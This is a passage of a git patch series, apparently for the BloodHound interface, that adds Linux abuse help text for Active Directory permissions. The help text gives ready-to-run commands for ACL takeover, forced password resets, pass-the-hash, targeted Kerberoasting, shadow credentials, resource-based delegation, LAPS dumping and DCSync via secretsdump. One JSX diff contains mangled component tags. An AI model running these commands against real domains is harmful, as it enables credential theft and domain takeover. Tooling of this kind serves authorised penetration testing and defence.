     sourceName,
     sourceType,
     targetName,
@@ -840,7 +840,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -849,4 +849,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool,
 };
 
-export default Abuse;
+export default WindowsAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx b/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx
index e0239efcd..41e268820 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const WriteDacl = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const WriteDacl = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

From 0023864aed17c30a78adee756cb213bc72e3e8ab Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:41:11 +0100
Subject: [PATCH 27/32] WriteOwner Linux abuse

---
 .../HelpTexts/WriteOwner/LinuxAbuse.jsx       | 687 ++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |   6 +-
 .../HelpTexts/WriteOwner/WriteOwner.jsx       |  20 +-
 3 files changed, 705 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/WriteOwner/{Abuse.jsx => WindowsAbuse.jsx} (99%)

diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
new file mode 100644
index 000000000..8045c73db
--- /dev/null
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -0,0 +1,687 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse ownership of a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To change the ownership of the object, you may use Impacket's owneredit
+                            example script (cf. "grant ownership" reference for the exact link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To change the ownership of the object, you may use Impacket's owneredit
+                            example script (cf. "grant ownership" reference for the exact link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With ownership of the OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With ownership of the container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx
similarity index 99%
rename from src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx
rename to src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx
index 53d75e14b..3b51c292d 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -854,7 +854,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -862,4 +862,4 @@ Abuse.propTypes = {
     targetId: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx b/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx
index 66954c36e..f9a6ef3af 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const WriteOwner = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const WriteOwner = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

From 867990f83d11eba1b3c694ffcafdd51693851d95 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:41:22 +0100
Subject: [PATCH 28/32] WriteSPN Linux abuse

---
 .../Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx  | 40 +++++++++++++++++++
 .../WriteSPN/{Abuse.jsx => WindowsAbuse.jsx}  |  6 +--
 .../Modals/HelpTexts/WriteSPN/WriteSPN.jsx    | 14 ++++---
 3 files changed, 52 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/WriteSPN/{Abuse.jsx => WindowsAbuse.jsx} (95%)

diff --git a/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx
new file mode 100644
index 000000000..40c7a0933
--- /dev/null
+++ b/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx
@@ -0,0 +1,40 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                A targeted kerberoast attack can be performed using{' '}
+                <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                The tool will automatically attempt a targetedKerberoast
+                attack, either on all users or against a specific one if
+                specified in the command line, and then obtain a crackable hash.
+                The cleanup is done automatically as well.
+            </p>
+
+            <p>
+                The recovered hash can be cracked offline using the tool
+                of your choice.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx b/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx
similarity index 95%
rename from src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx
rename to src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx
index 912c162d5..29d71ceef 100644
--- a/src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -58,9 +58,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx b/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx
index f8934551f..dfa979b91 100644
--- a/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx
+++ b/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,13 +18,16 @@ const WriteSPN = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <Windows AbusesourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <Linux AbusesourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

From e4e9a181c24bd9b5eb2d9dc09c4b61b9c17b01a1 Mon Sep 17 00:00:00 2001
From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com>
Date: Fri, 20 Jan 2023 17:29:08 +0100
Subject: [PATCH 29/32] Removing addcomputer.py step for AllowedToAct

---
 .../Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx       | 10 ----------
 1 file changed, 10 deletions(-)

diff --git a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
index 4360a5956..f4ea96c67 100644
--- a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx
@@ -4,16 +4,6 @@ import PropTypes from 'prop-types';
 const LinuxAbuse = ({ sourceName }) => {
     return (
         <>
-            First, if an attacker does not control an account with an
-            SPN set, a new attacker-controlled computer account can be
-            added with Impacket's addcomputer.py example script:
-            <pre>
-                <code>
-                    {
-                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
-                    }
-                </code>
-            </pre>
             We can then get a service ticket for the service name (sname) we
             want to "pretend" to be "admin" for. Impacket's getST.py example script
             can be used for that purpose.

From 1714f2e5dc7b943ca69c8f24edfb4be6227473ae Mon Sep 17 00:00:00 2001
From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com>
Date: Fri, 20 Jan 2023 17:30:10 +0100
Subject: [PATCH 30/32] Fixed missing extension for secretsdump on DCSync,
 Getchanges, GetChangesAll

---
 src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx        | 2 +-
 src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx    | 2 +-
 src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
index 0d0855642..f30480e7c 100644
--- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
